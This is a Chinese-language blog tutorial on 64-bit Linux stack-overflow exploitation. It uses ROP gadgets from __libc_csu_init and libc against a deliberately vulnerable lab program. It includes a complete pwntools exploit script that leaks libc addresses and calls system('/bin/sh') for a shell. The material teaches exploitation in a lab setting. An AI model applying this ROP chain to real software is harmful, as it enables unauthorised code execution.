<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="0x00 前言DynELF &amp;&amp; ROP和ret2libc &amp;&amp; ROP都是基于32位进行的栈溢出漏洞利用，这篇文章会介绍在64位系统下的栈溢出漏洞利用  环境： kaili 2017.2   64位 工具： pwntools  peda  安全机制只开启NX和ASLR 漏洞程序 vul.c #include &lt;stdio.h&gt; #include &amp;lt">
<meta property="og:type" content="article">
<meta property="og:title" content="[pwn] linux_64 ROP exploit">
<meta property="og:url" content="http://example.com/2018/04/03/linux64-rop-exp/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="0x00 前言DynELF &amp;&amp; ROP和ret2libc &amp;&amp; ROP都是基于32位进行的栈溢出漏洞利用，这篇文章会介绍在64位系统下的栈溢出漏洞利用  环境： kaili 2017.2   64位 工具： pwntools  peda  安全机制只开启NX和ASLR 漏洞程序 vul.c #include &lt;stdio.h&gt; #include &amp;lt">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2018/04/03/linux64-rop-exp/linux_64_rop_1_1.png">
<meta property="og:image" content="http://example.com/2018/04/03/linux64-rop-exp/linux_64_rop_3_1.png">
<meta property="og:image" content="http://example.com/2018/04/03/linux64-rop-exp/linux_64_rop_3_2.png">
<meta property="og:image" content="http://example.com/2018/04/03/linux64-rop-exp/linux_64_rop_3_3.png">
<meta property="og:image" content="http://example.com/2018/04/03/linux64-rop-exp/linux_64_rop_3_4.png">
<meta property="og:image" content="http://example.com/2018/04/03/linux64-rop-exp/linux_64_rop_3_5.png">
<meta property="article:published_time" content="2018-04-02T16:00:00.000Z">
<meta property="article:modified_time" content="2022-03-17T05:58:50.115Z">
<meta property="article:author" content="PENCH3R">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2018/04/03/linux64-rop-exp/linux_64_rop_1_1.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>[pwn] linux_64 ROP exploit</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.4.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/category/">Category</a></li><!--
     --><!--
       --><li><a href="/tag/">Tag</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2018/04/10/linux-heap-exploit-double-free/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2018/03/30/dynelf-rop/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2018/04/03/linux64-rop-exp/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2018/04/03/linux64-rop-exp/&text=[pwn] linux_64 ROP exploit"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2018/04/03/linux64-rop-exp/&title=[pwn] linux_64 ROP exploit"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2018/04/03/linux64-rop-exp/&is_video=false&description=[pwn] linux_64 ROP exploit"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=[pwn] linux_64 ROP exploit&body=Check out this article: http://example.com/2018/04/03/linux64-rop-exp/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2018/04/03/linux64-rop-exp/&title=[pwn] linux_64 ROP exploit"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2018/04/03/linux64-rop-exp/&title=[pwn] linux_64 ROP exploit"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2018/04/03/linux64-rop-exp/&title=[pwn] linux_64 ROP exploit"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2018/04/03/linux64-rop-exp/&title=[pwn] linux_64 ROP exploit"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2018/04/03/linux64-rop-exp/&name=[pwn] linux_64 ROP exploit&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2018/04/03/linux64-rop-exp/&t=[pwn] linux_64 ROP exploit"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">0x00 前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-32%E4%BD%8D%E4%BA%8E64%E4%BD%8D%E7%9A%84%E5%8C%BA%E5%88%AB"><span class="toc-number">2.</span> <span class="toc-text">0x01 32位于64位的区别</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E9%80%9A%E7%94%A8%E7%9A%84gadget"><span class="toc-number">3.</span> <span class="toc-text">0x02 通用的gadget</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">4.</span> <span class="toc-text">0x03 漏洞利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-%E6%80%BB%E7%BB%93"><span class="toc-number">5.</span> <span class="toc-text">0x04 总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-%E8%B8%A9%E8%BF%87%E7%9A%84%E5%9D%91"><span class="toc-number">6.</span> <span class="toc-text">0x05 踩过的坑</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        [pwn] linux_64 ROP exploit
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">PENCH3R</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2018-04-02T16:00:00.000Z" itemprop="datePublished">2018-04-03</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/BinarySecurity/">BinarySecurity</a>
    </div>


      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p><a target="_blank" rel="noopener" href="https://pench3r.github.io/2018/03/30/dynelf-rop.html">DynELF &amp;&amp; ROP</a>和<a target="_blank" rel="noopener" href="https://pench3r.github.io/2018/03/30/ret2libc-rop.html">ret2libc &amp;&amp; ROP</a>都是基于32位进行的栈溢出漏洞利用，这篇文章会介绍在64位系统下的栈溢出漏洞利用</p>
<ul>
<li>环境： kaili 2017.2   64位</li>
<li>工具： pwntools  peda</li>
</ul>
<p>安全机制只开启<code>NX</code>和<code>ASLR</code></p>
<p>漏洞程序 vul.c</p>
<pre><code>#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;

void vul_func() &#123;
    char msg[128];
    read(STDIN_FILENO, msg, 512);
&#125;

int main(int argc, char *argv[]) &#123;
    vul_func();
    write(STDOUT_FILENO,&quot;ROP test\n&quot;, 9); 
    return 0;
&#125;
</code></pre>
<p>编译： <code>gcc -g -no-pie -fno-stack-protector -o vul64 vul.c</code></p>
<p>由于64位的系统默认会开启<code>PIE</code>功能，所以编译时需要手动添加关闭。</p>
<h2 id="0x01-32位于64位的区别"><a href="#0x01-32位于64位的区别" class="headerlink" title="0x01 32位于64位的区别"></a>0x01 32位于64位的区别</h2><p><code>x86</code>和<code>x86_64</code>的主要区别有2个：</p>
<p>地址范围的变化，32位地址范围和64位的地址范围，并且x64位所能使用的内存范围不能超过<code>0x00007fffffffffff</code><br>参数传递方式的变化，32位的参数都是通过栈来传递，但是64位的参数是栈和寄存器配合传参，并且前面的参数是依次通过<code>rdi</code>，<code>rsi</code>，<code>rdx</code>，<code>rcx</code>，<code>r8</code>和<code>r9</code>等方式，剩下的通过栈来传递。</p>
<p>下图是引用<a target="_blank" rel="noopener" href="https://eli.thegreenplace.net/2011/09/06/stack-frame-layout-on-x86-64">另外一篇博客</a>，来说明x64位调用的方式</p>
<img src="/2018/04/03/linux64-rop-exp/linux_64_rop_1_1.png" class="">

<h2 id="0x02-通用的gadget"><a href="#0x02-通用的gadget" class="headerlink" title="0x02 通用的gadget"></a>0x02 通用的gadget</h2><p>x64中最常用ROP的是属于<code>__libc_csu_init</code>，但是由于它能控制的参数有限，以及参数的位数并非64位的，所以我们还需要扩充我们的资源，看还有那些可以构造<code>payload</code>的函数，以下为一些常见的函数可以利用的</p>
<ul>
<li>_init</li>
<li>_start</li>
<li>call_gmon_start</li>
<li>deregister_tm_clones</li>
<li>register_tm_clones</li>
<li>__do_global_dtors_aux</li>
<li>frame_dummy</li>
<li>__libc_csu_init</li>
<li>__libc_csu_fini</li>
<li>_fini</li>
</ul>
<p>上面的这些函数的地址都是保存在程序的<code>.text</code>区段中，所以地址不会改变(如果没有开启<code>PIE</code>)。</p>
<p>当然会有一些动态加载的库中有比较好用的<code>ROP</code>，前提是可以泄露出地址这样才能计算出函数的实际地址,例如<code>_dl_runtime_resolve_xsave</code>(<a target="_blank" rel="noopener" href="http://cb.drops.wiki/drops/papers-7551.html">蒸米的文章</a>中介绍的是<code>_dl_runtime_resolve</code>，我的系统里没有找到可能是库的版本不同)</p>
<h2 id="0x03-漏洞利用"><a href="#0x03-漏洞利用" class="headerlink" title="0x03 漏洞利用"></a>0x03 漏洞利用</h2><p>漏洞的利用依然是基于栈溢出漏洞来演示，我们通过基于已知的<code>libc.so</code>文件来计算函数的偏移，并通过<code>write</code>函数来<code>leak</code>内存地址，思路都在前言里面的2篇文章做过介绍，唯一的差别就是传递参数我们不能再直接通过栈来传递，需要找<code>ROP</code>，例如<code>pop rdi, pop rsi, ret</code>来进行参数传递</p>
<p>我们利用的目的依然还是调用<code>system</code>,来执行<code>/bin/sh</code></p>
<p><strong>第一种方法<code>__libc_csu_init</code>：</strong></p>
<p>首先获取内存地址，根据偏移来计算<code>system</code>的地址和<code>/bin/sh</code>的地址，由于使用ROPgadget并没有搜索到满足我们需求的<code>ROP</code>，但是在libc.so中，__libc_csu_init中提供了很有效的ROP链,使用<code>objdump -d -M intel vul64</code>查看关于<code>__libc_csu_init</code></p>
<pre>0000000000400590 __libc_csu_init:
  400590:   41 57                   push   r15 
  400592:   41 56                   push   r14 
  400594:   49 89 d7                mov    r15,rdx
  400597:   41 55                   push   r13 
  400599:   41 54                   push   r12 
  40059b:   4c 8d 25 6e 08 20 00    lea    r12,[rip+0x20086e]        # 600e10 __frame_dummy_init_array_entry  4005a2:   55                      push   rbp
  4005a3:   48 8d 2d 6e 08 20 00    lea    rbp,[rip+0x20086e]        # 600e18 __init_array_end
  4005aa:   53                      push   rbx 
  4005ab:   41 89 fd                mov    r13d,edi
  4005ae:   49 89 f6                mov    r14,rsi
  4005b1:   4c 29 e5                sub    rbp,r12
  4005b4:   48 83 ec 08             sub    rsp,0x8
  4005b8:   48 c1 fd 03             sar    rbp,0x3
  4005bc:   e8 3f fe ff ff          call   400400 
  4005c1:   48 85 ed                test   rbp,rbp
  4005c4:   74 20                   je     4005e6 
  4005c6:   31 db                   xor    ebx,ebx
  4005c8:   0f 1f 84 00 00 00 00    nop    DWORD PTR [rax+rax*1+0x0]
  4005cf:   00  
  4005d0:   4c 89 fa                mov    rdx,r15
  4005d3:   4c 89 f6                mov    rsi,r14
  4005d6:   44 89 ef                mov    edi,r13d
  4005d9:   41 ff 14 dc             call   QWORD PTR [r12+rbx*8]
  4005dd:   48 83 c3 01             add    rbx,0x1
  4005e1:   48 39 dd                cmp    rbp,rbx
  4005e4:   75 ea                   jne    4005d0 
  4005e6:   48 83 c4 08             add    rsp,0x8
  4005ea:   5b                      pop    rbx         # 必须为0
  4005eb:   5d                      pop    rbp         # 必须为1
  4005ec:   41 5c                   pop    r12         # function call
  4005ee:   41 5d                   pop    r13         # arg1
  4005f0:   41 5e                   pop    r14         # arg2
  4005f2:   41 5f                   pop    r15         # arg3
  4005f4:   c3                      ret</pre>       

<p>可以看到从<code>0x4005ea</code>开始，就依次将栈上的数据弹入到<code>rbx</code>, <code>rbp</code>, <code>r12</code>, <code>r13</code>, <code>r14</code>, <code>r15</code>中，在<code>0x4005d0</code>，又将<code>r15</code>传递给<code>rdx</code>(函数的第三个参数)，<code>r14</code>传递给<code>rsi</code>(函数的第二个参数)，<code>r13</code>传递给<code>edi</code>(函数的第1个参数)，随后通过<code>call   QWORD PTR [r12+rbx*8]</code>来调用函数，<code>r12</code>和<code>rbx</code>我们也是可以控制。后续会判断rbp，rbx是否相等，如果相等就会继续执行下面的<code>pop</code>并且<code>ret</code>就可以执行另外一个函数。 这样<code>libc.so</code>提供的<code>ROP</code>完全满足我们的需求，只是构造会比较麻烦一点。该库是在所有的<code>elf64</code>的程序里面都会加载的.</p>
<p>通过上面的信息作为基础，我们先构造<code>payload1</code>功能主要是调用<code>write</code>函数，并将<code>1(STDOUT_FILENO)</code>,<code>write@got</code>,<code>8(len)</code>3个参数进行传递获取到内存中write函数的地址</p>
<pre>payload1 = "\x90"*payload_len + (return_addr=__libc_csu_init+5a=0x4005ea) + (rbx=0) + (rbp=1)
payload1 += (r12=write_got) + (r13=1) + (r14=write_got) + (r15=8) + (0x4005d0)    # write函数的调用
payload1 += "b"*56 + (return_addr=main) # 当write函数调用结束后，会继续pop6次，所以返回地址设置到程序的主函数进行payload2发送</pre>

<p>获取到<code>write_addr</code>的内存地址后，通过偏移开始计算<code>system</code>的偏移地址，由于通过<code>__libc_csu_init</code>的ROP我们控制的第一个参数只能保存在<code>edi</code>，<code>32</code>位的空间所以无法直接使用<code>libc.so</code>中的<code>/bin/sh</code>的内存地址因为它是64位的,所以这里还要再加一层<code>payload</code>，通过<code>read</code>函数将<code>/bin/sh</code>写入到<code>.bss</code>段中(因为地址位数比较小，所以可以通过edi来传递)。</p>
<pre>write_addr = u64(p.recv(8))
system_addr = write_addr - (libc.symbols['write'] - libc.symbols['system'])</pre>

<p>在获取到<code>system</code>地址后，我们需要通过<code>read</code>函数将<code>/bin/sh</code>写入到程序的<code>.bss</code>段中，这样方便我们将该地址传入到<code>edi</code>，调用<code>system</code>函数拿到<code>shell</code>.这个具体的构造可以参照<a target="_blank" rel="noopener" href="http://cb.drops.wiki/drops/papers-7551.html">蒸米的这篇文章</a>来进行操作</p>
<p><strong>第二种<code>_dl_runtime_resolve_xsave</code>:</strong></p>
<pre>0x00007ffff7ded240 +0:    push   rbx
   0x00007ffff7ded241 +1:    mov    rbx,rsp
   0x00007ffff7ded244 +4:    and    rsp,0xffffffffffffffc0
   0x00007ffff7ded248 +8:    sub    rsp,QWORD PTR [rip+0x20f5b9]        # 0x7ffff7ffc808 _rtld_global_ro+168
   0x00007ffff7ded24f +15:    mov    QWORD PTR [rsp],rax
   0x00007ffff7ded253 +19:    mov    QWORD PTR [rsp+0x8],rcx
   0x00007ffff7ded258 +24:    mov    QWORD PTR [rsp+0x10],rdx
   0x00007ffff7ded25d +29:    mov    QWORD PTR [rsp+0x18],rsi
   0x00007ffff7ded262 +34:    mov    QWORD PTR [rsp+0x20],rdi
   0x00007ffff7ded267 +39:    mov    QWORD PTR [rsp+0x28],r8
   0x00007ffff7ded26c +44:    mov    QWORD PTR [rsp+0x30],r9
   0x00007ffff7ded271 +49:    mov    eax,0xee
   0x00007ffff7ded276 +54:    xor    edx,edx
   0x00007ffff7ded278 +56:    mov    QWORD PTR [rsp+0x240],rdx
   0x00007ffff7ded280 +64:    mov    QWORD PTR [rsp+0x248],rdx
   0x00007ffff7ded288 +72:    mov    QWORD PTR [rsp+0x250],rdx
   0x00007ffff7ded290 +80:    mov    QWORD PTR [rsp+0x258],rdx
   0x00007ffff7ded298 +88:    mov    QWORD PTR [rsp+0x260],rdx
   0x00007ffff7ded2a0 +96:    mov    QWORD PTR [rsp+0x268],rdx
   0x00007ffff7ded2a8 +104:    mov    QWORD PTR [rsp+0x270],rdx
   0x00007ffff7ded2b0 +112:    mov    QWORD PTR [rsp+0x278],rdx
   0x00007ffff7ded2b8 +120:    xsave  [rsp+0x40]
   0x00007ffff7ded2bd +125:    mov    rsi,QWORD PTR [rbx+0x10]
   0x00007ffff7ded2c1 +129:    mov    rdi,QWORD PTR [rbx+0x8]
   0x00007ffff7ded2c5 +133:    call   0x7ffff7de6630 _dl_fixup
   0x00007ffff7ded2ca +138:    mov    r11,rax
   0x00007ffff7ded2cd +141:    mov    eax,0xee
   0x00007ffff7ded2d2 +146:    xor    edx,edx
   0x00007ffff7ded2d4 +148:    xrstor [rsp+0x40]        # dl_runtime_resolve 是没有这条指令
   0x00007ffff7ded2d9 +153:    mov    r9,QWORD PTR [rsp+0x30]
   0x00007ffff7ded2de +158:    mov    r8,QWORD PTR [rsp+0x28]
   0x00007ffff7ded2e3 +163:    mov    rdi,QWORD PTR [rsp+0x20]
   0x00007ffff7ded2e8 +168:    mov    rsi,QWORD PTR [rsp+0x18]
   0x00007ffff7ded2ed +173:    mov    rdx,QWORD PTR [rsp+0x10]
   0x00007ffff7ded2f2 +178:    mov    rcx,QWORD PTR [rsp+0x8]
   0x00007ffff7ded2f7 +183:    mov    rax,QWORD PTR [rsp]
   0x00007ffff7ded2fb +187:    mov    rsp,rbx
   0x00007ffff7ded2fe +190:    mov    rbx,QWORD PTR [rsp]
   0x00007ffff7ded302 +194:    add    rsp,0x18
   0x00007ffff7ded306 +198:    bnd jmp r11</pre>

<p>从上图的<code>_dl_runtime_resolve_xsave</code>汇编代码中可以看到，从<code>0x00007ffff7ded2d9</code>开始，我们可以一次控制所有寄存器的参数，最后通过<code>jmp r11</code>进行函数调用，而<code>r11</code>可以在<code>0x00007ffff7ded2ca</code>由<code>rax</code>传入。</p>
<p>总体的思路还是通过调用<code>system</code>函数将<code>/bin/sh</code>的字符串的地址传入，这2个地址都通过在<code>libc.so</code>中的偏移来计算</p>
<pre><code>payload1 = &quot;\x90&quot;*136 + (return_addr=__libc_csu_init+5a=0x4005ea) + (rbx=0) + (rbp=1)
payload1 += (r12=write_got) + (r13=1) + (r14=write_got) + (r15=8) + (0x4005d0)
payload1 += &quot;b&quot;*56 + (return_addr=main)
</code></pre>
<p>测试功能正常：</p>
<img src="/2018/04/03/linux64-rop-exp/linux_64_rop_3_1.png" class="">

<p><code>payload1</code>我们就可以成功获取到<code>system</code>和<code>/bin/sh</code>的地址，以及<code>libc</code>的基地址,接下来我们需要调用<code>system</code>函数，首先通过<code>pop rax;ret</code>将system的地址传入到rax，之后再跳转到<code>0x00007ffff7ded2ca</code>将<code>rax</code>传入<code>r11</code>,所以我们还需要获取<code>_dl_runtime_resolve_xsave</code>的基地址，可以通过程序的<code>plt</code>表中的<code>_GLOBAL_OFFSET_TABLE_+0x10</code>获取</p>
<img src="/2018/04/03/linux64-rop-exp/linux_64_rop_3_2.png" class="">

<p>构造payload2获取<code>_dl_runtime_resolve_xsave</code>的基地址.</p>
<pre><code>payload2 = &quot;\x90&quot;*136 + (return_addr=__libc_csu_init+5a=0x4005ea) + (rbx=0) + (rbp=1)
payload2 += (r12=write_got) + (r13=1) + (r14=_dl_runtime_resolve_xsave=0x601010) + (r15=8) + (0x4005d0)
payload2 += &quot;b&quot;*56 + (return_addr=main)
</code></pre>
<p>最后一步基于我们所有获取到的信息开始调用<code>system</code>获取<code>shell</code></p>
<pre><code>payload3 = &quot;\x90&quot;*136 + (return_addr=pop_rax_ret_addr) + (system_addr) + (_dl_runtime_resolve_xsave+138) 
payload3 += (rax=0) + (rcx=0) + (rdx=0) + (rsi=0) + (binsh_addr) + (r8) + r(r9)
</code></pre>
<p>这个就是payload3的基本布局.</p>
<p>一切都准备就绪，但是不知道什么原因在执行到<code>0x00007ffff7ded2d4 &lt;+148&gt;:    xrstor [rsp+0x40]</code>程序直接退出，而且正常应该是执行<code>_dl_runtime_resolve</code>, 但是我换了2个环境分别是<code>_dl_runtime_resolve_xsave</code>和<code>_dl_runtime_resolve_avx</code>。均无法正常执行payload， 如果是正常的<code>_dl_runtime_resolve</code>可定可以拿到shell的</p>
<p>所以我这里就另外构造了一个payload4来继续完成x64环境的利用，通过<code>ROPgadget</code>命令</p>
<pre><code>ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6  --only &#39;pop|ret&#39;
</code></pre>
<p>意外发现了<code>pop rdi;ret</code>,这条指令是在<code>init_cacheinfo+239</code>。</p>
<img src="/2018/04/03/linux64-rop-exp/linux_64_rop_3_3.png" class="">

<p>再配合着<code>_init</code>中的<code>call rax</code>和<code>pop rax;ret</code>，就可以成功调用<code>system</code>函数</p>
<img src="/2018/04/03/linux64-rop-exp/linux_64_rop_3_4.png" class="">

<p>因此最终我们的payload4为：</p>
<pre><code>payload4 = &quot;\x90&quot;*136 + (return_addr=pop_rax_ret) + (system_addr)
payload4 += (pop_rdi_ret) + (binsh_addr)
payload4 += (call_rax)
</code></pre>
<p>最终整合所有的payload，利用脚本如下(payload3在脚本中没有使用)：</p>
<pre>#!/usr/bin/python

from pwn import *

p = process('./vul64')
#p = remote('127.0.0.1', 10000)
elf = ELF('./vul64')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

#context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
#gdb.attach(proc.pidof(p)[0], gdbscript="b * 0x0400557\nc\n")

pop_rax_ret_off = 0x00000000000380b8  # pop rax; ret
write_plt = elf.symbols['write']
write_got = elf.got['write']
print "[+] the write got address is " + hex(write_got)
main = elf.symbols['main']
print "[+] the main address is " + hex(main)

payload_len = 136  # pattern_create and pattern_offset

p6_ret = elf.symbols['__libc_csu_init'] + 0x5A
print "[+] The libc csu init function " + hex(p6_ret)

# payload to acquire the write function address
payload1 = "\x90"*payload_len + p64(p6_ret) + p64(0) + p64(1)
payload1 += p64(write_got) + p64(1) + p64(write_got) + p64(8)
payload1 += p64(0x4005d0)
payload1 += "A"*56
payload1 += p64(main)

p.send(payload1)

sleep(1)
write_addr = u64(p.recv(8))
print "[+] the write function address is " + hex(write_addr)

libc_base = write_addr - libc.symbols['write']
print "[+] the libc base address is " + hex(libc_base)
system_addr = write_addr - (libc.symbols['write'] - libc.symbols['system'])
print "[+] the system function address is " + hex(system_addr)
binsh_addr = write_addr - (libc.symbols['write'] - next(libc.search('/bin/sh')))
print "[+] the /bin/sh string address is " + hex(binsh_addr)
pop_rax_ret = libc_base + pop_rax_ret_off  # pop rax; ret
print "[+] the pop rax; ret address is " + hex(pop_rax_ret)
pop_rdi_ret_off = 0x02144f
pop_rdi_ret = libc_base + pop_rdi_ret_off  # 0x000000000002144f : pop rdi ; ret
print "[+] the pop rdi; ret address is " + hex(pop_rdi_ret)
call_rax = 0x400410  # _init call rax;


# payload2 to acquire the dl_runtime_resolve_xsave address
dl_runtime_got = 0x601010
payload2 = "\x90"*payload_len + p64(p6_ret) + p64(0) + p64(1)
payload2 += p64(write_got) + p64(1) + p64(dl_runtime_got) + p64(8)
payload2 += p64(0x4005d0)
payload2 += "A"*56
payload2 += p64(main)

p.send(payload2)

sleep(1)
dl_runtime_resolve_xsave = u64(p.recv(8))
print "[+] the dl_runtime_resolve_xsave base address is " + hex(dl_runtime_resolve_xsave)

# payload3 to get shell use dl_runtime_resolve_xsave
# not use
payload3 = "\x90"*136 + p64(pop_rax_ret) + p64(system_addr) + p64(dl_runtime_resolve_xsave+49)
payload3 += p64(0) + p64(0) + p64(0) + p64(0) # rax=rcx=rdx=rsi=0
payload3 += p64(binsh_addr)
payload3 += p64(0) + p64(0) # r8=r9=0
payload3 += p64(0) + p64(0x0000002000000000) + p64(0) # xrstor [rsp+0x40]; 0x0000002000000000   0x0000000000000000

# payload4 to get shell use simple rop
payload4 = "\x90"*136 + p64(pop_rax_ret) + p64(system_addr)
payload4 += p64(pop_rdi_ret) + p64(binsh_addr)
payload4 += p64(call_rax)

print "[*] Begin to get shell..."
p.send(payload4)
p.interactive()</pre>

<p>测试运行</p>
<img src="/2018/04/03/linux64-rop-exp/linux_64_rop_3_5.png" class="">

<h2 id="0x04-总结"><a href="#0x04-总结" class="headerlink" title="0x04 总结"></a>0x04 总结</h2><p>在这次实践中，可能是由于环境问题无法完美的进行x64的利用，不过核心思路已经是明确，主要是通过内置的ROP，再配合内存地址泄漏，可以控制大部分的参数，最后调用函数，在蒸米的文章中还有介绍<a target="_blank" rel="noopener" href="http://cb.drops.wiki/drops/binary-10638.html">调用mmap来执行任意shellcode</a>(例如msf的反弹shell)</p>
<p>目前为止<a target="_blank" rel="noopener" href="https://pench3r.github.io/2018/03/28/linux-simple-stack-overflow.html">Linux Simple Stack overflow</a>、<a target="_blank" rel="noopener" href="https://pench3r.github.io/2018/03/30/dynelf-rop.html">DynELF &amp;&amp; ROP</a>和<a target="_blank" rel="noopener" href="https://pench3r.github.io/2018/03/30/ret2libc-rop.html">ret2libc &amp;&amp; ROP</a>介绍了基本的栈溢出漏洞的原理、ret2libc利用技术、应用程序常见的安全机制、ROP的构建和寻找、pwntools工具的使用、DynELF模块的使用、x86于x86_64位的区别、x64位如何通过ROP进行shellcode调用等技术，都算是一些基础算是pwn的基础出门了，了解这些后方便后续的学习，也会通过一些ctf的pwn题目做实战。</p>
<h2 id="0x05-踩过的坑"><a href="#0x05-踩过的坑" class="headerlink" title="0x05 踩过的坑"></a>0x05 踩过的坑</h2><ul>
<li>程序接收的输入长度，影响自己的payload(这个在实践x64的时候大意没有考虑到，导致自己的payload总是差1字节)；</li>
<li>对于一些填充字节的计算一定要仔细(之前填充的字节少了一个x导致变成了多字符，而不是1个字节)</li>
<li>参考别人文章的时候可能工具的更新导致使用方法改变(查看官方手册去解决问题，准确效率高)</li>
<li>对于一些莫名的问题，需要多去搜集信息试错(在DynELF中的leak函数中之前一直设置成为vul_func，但是一直失败，设置成为main函数后就成功了)</li>
<li>多使用gdb来进行细节的追踪(可以发现自己错在哪里，很重要的一点)</li>
<li>使用msf生成payload如果测试失败，尝试再生成一个(每次生成的不太一样，可能由于你的payload中存在你不了解的错误字节导致)</li>
</ul>
<p>以上总结的都是一些小问题，通过这些东西不断优化自己的细节，因为软件漏洞调试真的细节太多了!!!</p>
<p>KEEP GOING! :P</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/category/">Category</a></li>
         
          <li><a href="/tag/">Tag</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
